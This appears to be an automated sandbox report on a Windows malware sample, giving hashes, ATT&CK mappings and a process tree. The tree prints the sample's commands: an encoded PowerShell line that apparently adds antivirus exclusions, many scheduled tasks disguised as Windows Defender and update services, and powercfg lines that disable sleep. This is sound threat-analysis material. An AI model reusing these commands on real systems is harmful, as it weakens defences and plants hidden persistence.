6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb

Analysis

max time kernel
284s
max time network
288s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
06/01/2023, 22:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe
Size

1.2MB
MD5

ba53c8e0f9791f8e5f45e2c02e733f13
SHA1

d69647626d0beb5779450916a4fa89d3e4adb2bb
SHA256

6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb
SHA512

2d5e61fbb3e7364217a0eaad88f7fa8cf92b611cd0b5a56fe55bf8db050e323b1ab5940ea05ad14238de52d66d2a07e8cf1b542954919f763483c7e9d0c6cbd0
SSDEEP

24576:Dkyrk3eXEORnGOLogpmdhrquAgBh6jbgtca+ZuJ:YeUsRKkUtcM

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	325515914-aoz988JA16Qh6yGQ.exe

Executes dropped EXE 2 IoCs

pid	Process
1204	325515914-aoz988JA16Qh6yGQ.exe
4688	RegSvc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4548	schtasks.exe
2160	schtasks.exe
5024	schtasks.exe
4088	schtasks.exe
1856	schtasks.exe
4080	schtasks.exe
1340	schtasks.exe
5012	schtasks.exe
4560	schtasks.exe
3308	schtasks.exe
4444	schtasks.exe
4060	schtasks.exe
3516	schtasks.exe
4984	schtasks.exe
1904	schtasks.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1204	325515914-aoz988JA16Qh6yGQ.exe
4904	powershell.exe
4904	powershell.exe
4904	powershell.exe
4904	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	2672	6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe
Token: SeDebugPrivilege	1204	325515914-aoz988JA16Qh6yGQ.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeShutdownPrivilege	5048	powercfg.exe
Token: SeCreatePagefilePrivilege	5048	powercfg.exe
Token: SeShutdownPrivilege	2844	powercfg.exe
Token: SeCreatePagefilePrivilege	2844	powercfg.exe
Token: SeShutdownPrivilege	4684	powercfg.exe
Token: SeCreatePagefilePrivilege	4684	powercfg.exe
Token: SeShutdownPrivilege	436	powercfg.exe
Token: SeCreatePagefilePrivilege	436	powercfg.exe
Token: SeShutdownPrivilege	3156	powercfg.exe
Token: SeCreatePagefilePrivilege	3156	powercfg.exe
Token: SeShutdownPrivilege	3156	powercfg.exe
Token: SeCreatePagefilePrivilege	3156	powercfg.exe
Token: SeDebugPrivilege	4688	RegSvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2672 wrote to memory of 1204	2672	6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe	66
PID 2672 wrote to memory of 1204	2672	6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe	66
PID 2672 wrote to memory of 1204	2672	6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe	66
PID 1204 wrote to memory of 5036	1204	325515914-aoz988JA16Qh6yGQ.exe	69
PID 1204 wrote to memory of 5036	1204	325515914-aoz988JA16Qh6yGQ.exe	69
PID 1204 wrote to memory of 5036	1204	325515914-aoz988JA16Qh6yGQ.exe	69
PID 5036 wrote to memory of 4904	5036	cmd.exe	71
PID 5036 wrote to memory of 4904	5036	cmd.exe	71
PID 5036 wrote to memory of 4904	5036	cmd.exe	71
PID 1204 wrote to memory of 4936	1204	325515914-aoz988JA16Qh6yGQ.exe	72
PID 1204 wrote to memory of 4936	1204	325515914-aoz988JA16Qh6yGQ.exe	72
PID 1204 wrote to memory of 4936	1204	325515914-aoz988JA16Qh6yGQ.exe	72
PID 1204 wrote to memory of 3164	1204	325515914-aoz988JA16Qh6yGQ.exe	73
PID 1204 wrote to memory of 3164	1204	325515914-aoz988JA16Qh6yGQ.exe	73
PID 1204 wrote to memory of 3164	1204	325515914-aoz988JA16Qh6yGQ.exe	73
PID 1204 wrote to memory of 5056	1204	325515914-aoz988JA16Qh6yGQ.exe	74
PID 1204 wrote to memory of 5056	1204	325515914-aoz988JA16Qh6yGQ.exe	74
PID 1204 wrote to memory of 5056	1204	325515914-aoz988JA16Qh6yGQ.exe	74
PID 1204 wrote to memory of 5080	1204	325515914-aoz988JA16Qh6yGQ.exe	75
PID 1204 wrote to memory of 5080	1204	325515914-aoz988JA16Qh6yGQ.exe	75
PID 1204 wrote to memory of 5080	1204	325515914-aoz988JA16Qh6yGQ.exe	75
PID 1204 wrote to memory of 1028	1204	325515914-aoz988JA16Qh6yGQ.exe	76
PID 1204 wrote to memory of 1028	1204	325515914-aoz988JA16Qh6yGQ.exe	76
PID 1204 wrote to memory of 1028	1204	325515914-aoz988JA16Qh6yGQ.exe	76
PID 1204 wrote to memory of 660	1204	325515914-aoz988JA16Qh6yGQ.exe	77
PID 1204 wrote to memory of 660	1204	325515914-aoz988JA16Qh6yGQ.exe	77
PID 1204 wrote to memory of 660	1204	325515914-aoz988JA16Qh6yGQ.exe	77
PID 1204 wrote to memory of 1328	1204	325515914-aoz988JA16Qh6yGQ.exe	79
PID 1204 wrote to memory of 1328	1204	325515914-aoz988JA16Qh6yGQ.exe	79
PID 1204 wrote to memory of 1328	1204	325515914-aoz988JA16Qh6yGQ.exe	79
PID 1204 wrote to memory of 1816	1204	325515914-aoz988JA16Qh6yGQ.exe	81
PID 1204 wrote to memory of 1816	1204	325515914-aoz988JA16Qh6yGQ.exe	81
PID 1204 wrote to memory of 1816	1204	325515914-aoz988JA16Qh6yGQ.exe	81
PID 1204 wrote to memory of 1524	1204	325515914-aoz988JA16Qh6yGQ.exe	83
PID 1204 wrote to memory of 1524	1204	325515914-aoz988JA16Qh6yGQ.exe	83
PID 1204 wrote to memory of 1524	1204	325515914-aoz988JA16Qh6yGQ.exe	83
PID 1204 wrote to memory of 304	1204	325515914-aoz988JA16Qh6yGQ.exe	85
PID 1204 wrote to memory of 304	1204	325515914-aoz988JA16Qh6yGQ.exe	85
PID 1204 wrote to memory of 304	1204	325515914-aoz988JA16Qh6yGQ.exe	85
PID 1204 wrote to memory of 2340	1204	325515914-aoz988JA16Qh6yGQ.exe	87
PID 1204 wrote to memory of 2340	1204	325515914-aoz988JA16Qh6yGQ.exe	87
PID 1204 wrote to memory of 2340	1204	325515914-aoz988JA16Qh6yGQ.exe	87
PID 1204 wrote to memory of 4092	1204	325515914-aoz988JA16Qh6yGQ.exe	88
PID 1204 wrote to memory of 4092	1204	325515914-aoz988JA16Qh6yGQ.exe	88
PID 1204 wrote to memory of 4092	1204	325515914-aoz988JA16Qh6yGQ.exe	88
PID 1204 wrote to memory of 704	1204	325515914-aoz988JA16Qh6yGQ.exe	90
PID 1204 wrote to memory of 704	1204	325515914-aoz988JA16Qh6yGQ.exe	90
PID 1204 wrote to memory of 704	1204	325515914-aoz988JA16Qh6yGQ.exe	90
PID 1204 wrote to memory of 2304	1204	325515914-aoz988JA16Qh6yGQ.exe	92
PID 1204 wrote to memory of 2304	1204	325515914-aoz988JA16Qh6yGQ.exe	92
PID 1204 wrote to memory of 2304	1204	325515914-aoz988JA16Qh6yGQ.exe	92
PID 1204 wrote to memory of 3956	1204	325515914-aoz988JA16Qh6yGQ.exe	96
PID 1204 wrote to memory of 3956	1204	325515914-aoz988JA16Qh6yGQ.exe	96
PID 1204 wrote to memory of 3956	1204	325515914-aoz988JA16Qh6yGQ.exe	96
PID 4936 wrote to memory of 1856	4936	cmd.exe	102
PID 4936 wrote to memory of 1856	4936	cmd.exe	102
PID 4936 wrote to memory of 1856	4936	cmd.exe	102
PID 3164 wrote to memory of 4060	3164	cmd.exe	104
PID 3164 wrote to memory of 4060	3164	cmd.exe	104
PID 3164 wrote to memory of 4060	3164	cmd.exe	104
PID 5056 wrote to memory of 4548	5056	cmd.exe	103
PID 5056 wrote to memory of 4548	5056	cmd.exe	103
PID 5056 wrote to memory of 4548	5056	cmd.exe	103
PID 5080 wrote to memory of 4560	5080	cmd.exe	105

C:\Users\Admin\AppData\Local\Temp\6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe
"C:\Users\Admin\AppData\Local\Temp\6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Users\Admin\AppData\Local\Temp\325515914-aoz988JA16Qh6yGQ.exe
  "C:\Users\Admin\AppData\Local\Temp\325515914-aoz988JA16Qh6yGQ.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1204
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAHEAWABYAEEAaABXAGgAYgB1AHkAYgBJAHEARgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFEATABlAHYAcQBHAGkAagBFAEUAUQBRAFgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHoAUgBFAHkAQgBlAGcAaQBLAFkAYQB6AE8AYQBXAEYAYgAjAD4AIABAACgAIAA8ACMAQQBaAHAAWQBnAGwAZwBzAG4AagB0ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBQAEoAagBTAEMAUABXAEIAYgBRAHcAdQB4AGwAWQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcQBEAEEASwBhAEkAbQBWAFEAZwBXAEsAZwBMAGsAVgBTACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEQAUwBNAEsAbwBXAHkAaABVAEwAcQBjAHMAbgBqACMAPgA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAHEAWABYAEEAaABXAGgAYgB1AHkAYgBJAHEARgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFEATABlAHYAcQBHAGkAagBFAEUAUQBRAFgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHoAUgBFAHkAQgBlAGcAaQBLAFkAYQB6AE8AYQBXAEYAYgAjAD4AIABAACgAIAA8ACMAQQBaAHAAWQBnAGwAZwBzAG4AagB0ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBQAEoAagBTAEMAUABXAEIAYgBRAHcAdQB4AGwAWQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcQBEAEEASwBhAEkAbQBWAFEAZwBXAEsAZwBMAGsAVgBTACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEQAUwBNAEsAbwBXAHkAaABVAEwAcQBjAHMAbgBqACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4904
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3164
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:4060
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5056
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:4548
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5080
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:4560
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:1028
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:3516
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:660
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:4080
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:1328
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:1816
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:3308
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk462" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:1524
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk462" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1340
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk190" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:304
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk190" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:5012
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk501" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:2340
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk501" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk498" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:4092
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk498" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:4984
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:704
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:5024
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
    3⤵
    PID:2304
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5048
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2844
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4684
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:436
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3156
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
    3⤵
    PID:3956
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4088

C:\ProgramData\RuntimeBrokerData\RegSvc.exe
C:\ProgramData\RuntimeBrokerData\RegSvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4688

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RuntimeBrokerData\RegSvc.exe

Filesize
72KB

MD5
677f415e841a0febe53c9709eb10d0f3

SHA1
5d97e32c547038ba8b0da45f7a662c1a5413c3fe

SHA256
274a320fac1071cb2cac3a8cbfa410ec4e60980a9669d0bc3287cd869c7b99f1

SHA512
a35e80b5cf32788e0dc8ecd8d9b3a6193c9993f6a4c40d196107ba3bc805bf038fa7181b3b90910a8161390f7b2285ac1a705b191e008a7a1b05bc1e2b591d33

Download Submit
C:\ProgramData\RuntimeBrokerData\RegSvc.exe

Filesize
72KB

MD5
677f415e841a0febe53c9709eb10d0f3

SHA1
5d97e32c547038ba8b0da45f7a662c1a5413c3fe

SHA256
274a320fac1071cb2cac3a8cbfa410ec4e60980a9669d0bc3287cd869c7b99f1

SHA512
a35e80b5cf32788e0dc8ecd8d9b3a6193c9993f6a4c40d196107ba3bc805bf038fa7181b3b90910a8161390f7b2285ac1a705b191e008a7a1b05bc1e2b591d33

Download Submit
C:\Users\Admin\AppData\Local\Temp\325515914-aoz988JA16Qh6yGQ.exe

Filesize
452KB

MD5
d9e81ea22cab99178c4e7bf5892e33c7

SHA1
fbde8aad0b3b2201a42fcefdde6654dbdbd339af

SHA256
4dae7b8e4f7a0a31eda8c4083a024a2fb6821d6dacca28adec35aa118a407207

SHA512
213176f396e0bb76264bc2a0a2bb895e891d7282bb6e8f9df2eed123cd9460afd4e0e0d74e1e3b62f8b2e16285fdf0be40d8b48547e2e292fc11b6757860930b

Download Submit
C:\Users\Admin\AppData\Local\Temp\325515914-aoz988JA16Qh6yGQ.exe

Filesize
452KB

MD5
d9e81ea22cab99178c4e7bf5892e33c7

SHA1
fbde8aad0b3b2201a42fcefdde6654dbdbd339af

SHA256
4dae7b8e4f7a0a31eda8c4083a024a2fb6821d6dacca28adec35aa118a407207

SHA512
213176f396e0bb76264bc2a0a2bb895e891d7282bb6e8f9df2eed123cd9460afd4e0e0d74e1e3b62f8b2e16285fdf0be40d8b48547e2e292fc11b6757860930b

Download Submit
memory/1204-251-0x00000000009A0000-0x0000000000A18000-memory.dmp

Filesize
480KB

Download
memory/1204-254-0x0000000007CC0000-0x00000000081BE000-memory.dmp

Filesize
5.0MB

Download
memory/1204-256-0x00000000077C0000-0x0000000007852000-memory.dmp

Filesize
584KB

Download
memory/1204-272-0x00000000053C0000-0x00000000053CA000-memory.dmp

Filesize
40KB

Download
memory/1204-295-0x000000000A580000-0x000000000A5E6000-memory.dmp

Filesize
408KB

Download
memory/2672-177-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-172-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-141-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-142-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-143-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-144-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-145-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-146-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-147-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-148-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-149-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-150-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-151-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-152-0x00000000008E0000-0x0000000000A1A000-memory.dmp

Filesize
1.2MB

Download
memory/2672-153-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-154-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-155-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-156-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-157-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-158-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-159-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-160-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-161-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-162-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-163-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-164-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-165-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-166-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-167-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-168-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-169-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-170-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-171-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-126-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-173-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-174-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-175-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-176-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-139-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-178-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-179-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-138-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-137-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-136-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-180-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-181-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-182-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-183-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-184-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-120-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-121-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-122-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-125-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-124-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-123-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
memory/2672-135-0x0000000077560000-0x00000000776EE000-memory.dmp

Filesize
1.6MB

Download
